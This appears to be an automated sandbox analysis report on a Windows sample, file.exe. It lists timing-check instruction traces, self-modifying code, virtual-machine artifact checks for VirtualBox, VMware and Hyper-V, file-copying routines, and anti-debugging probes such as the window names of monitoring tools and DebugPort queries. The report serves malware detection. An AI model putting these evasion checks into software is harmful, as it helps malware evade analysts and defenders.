                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94CC second address: 12E951F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2CCC4B416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push edx 0x0000000d mov bx, di 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 jmp 00007FC2CCC4B41Bh 0x00000018 push 00000000h 0x0000001a mov ebx, 018150ABh 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 jmp 00007FC2CCC4B41Bh 0x00000026 pushad 0x00000027 jmp 00007FC2CCC4B421h 0x0000002c jns 00007FC2CCC4B416h 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push edi 0x00000038 pushad 0x00000039 popad 0x0000003a pop edi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6AA second address: 12EC6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC2CCD28606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6B5 second address: 12EC6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, si 0x0000000d jmp 00007FC2CCC4B426h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 mov dword ptr [ebp+1245AEEDh], eax 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D31ADh], edi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FC2CCC4B41Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6FE second address: 12EC703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335E80 second address: 1335E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133B835 second address: 133B85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC2CCC4B432h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134250C second address: 1342514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342514 second address: 1342518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134192D second address: 1341931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C35 second address: 1341C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C3E second address: 1341C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341C42 second address: 1341C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007FC2CCC4B416h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DBB second address: 1341DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC2CCD2860Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DCA second address: 1341DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC2CCC4B416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DD4 second address: 1341DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DD8 second address: 1341DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341DE2 second address: 1341DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134207B second address: 134207F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1342246 second address: 1342252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC2CCD28606h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AE9E second address: 134AEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AEA4 second address: 134AECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2CCD28610h 0x0000000c jmp 00007FC2CCD28612h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134966B second address: 1349671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134995A second address: 134995E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134995E second address: 1349962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1349C33 second address: 1349C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007FC2CCD28606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135140A second address: 1351419 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2CCC4B416h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351419 second address: 1351426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC7D second address: 135FC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC82 second address: 135FC8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12890EE second address: 12890F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364669 second address: 136466F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136466F second address: 1364679 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2CCC4B416h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13694DA second address: 13694DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13694DE second address: 13694E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B901 second address: 136B93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FC2CCD28611h 0x0000000c popad 0x0000000d jmp 00007FC2CCD28614h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC2CCD2860Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B93E second address: 136B944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AC9F second address: 137ACA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACA3 second address: 137ACB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACB6 second address: 137ACEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2CCD28615h 0x00000008 jne 00007FC2CCD28606h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FC2CCD28616h 0x00000019 jmp 00007FC2CCD2860Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ACEB second address: 137ACEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379762 second address: 1379768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A09 second address: 1379A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A0D second address: 1379A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379A11 second address: 1379A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379B8E second address: 1379BA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC2CCD2860Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379BA0 second address: 1379BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B425h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC2CCC4B41Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379BC8 second address: 1379BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC2CCD28606h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1379EA0 second address: 1379EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2CCC4B416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C29D second address: 137C2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C2A8 second address: 137C2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13804D2 second address: 13804F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC2CCD28614h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13804F0 second address: 1380511 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCC4B416h 0x00000008 jmp 00007FC2CCC4B427h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EF9D second address: 139EFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FC2CCD28606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB76 second address: 13AFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB7A second address: 13AFB7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB7E second address: 13AFB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC2CCC4B416h 0x0000000e jns 00007FC2CCC4B416h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFB92 second address: 13AFBAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FC2CCD28606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jg 00007FC2CCD28626h 0x00000013 pushad 0x00000014 jne 00007FC2CCD28606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFBAE second address: 13AFBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnp 00007FC2CCC4B416h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF94 second address: 13AFF9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCD28606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFF9E second address: 13AFFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFFAA second address: 13AFFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC2CCD28606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFFBA second address: 13AFFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B00EF second address: 13B00F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B33BB second address: 13B33D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007FC2CCC4B422h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B628C second address: 13B62A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B62A6 second address: 13B62AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B7CBB second address: 13B7CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B780E second address: 13B782F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jo 00007FC2CCC4B416h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302DE second address: 52302E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302E2 second address: 52302E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52302E8 second address: 5230323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov ax, 9CDDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC2CCD28614h 0x00000016 xor cx, 3668h 0x0000001b jmp 00007FC2CCD2860Bh 0x00000020 popfd 0x00000021 mov ax, 745Fh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 112192F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12C5DF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12F3752 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12D0945 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1352CBB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 0_2_00ED38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00ED4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_00ECDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_00ECE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00ED4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_00ECED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00EC16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00ED3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00ECF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_00ECBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00ECDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC1160 GetSystemInfo,ExitProcess, | 0_2_00EC1160
Source: file.exe, file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareE0
Source: file.exe, 00000000.00000002.1720287948.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1720287948.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1720287948.0000000000E02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13349
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13346
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13366
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13361
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13400
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00EC45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00ED9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9750 mov eax, dword ptr fs:[00000030h] | 0_2_00ED9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, | 0_2_00ED78E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
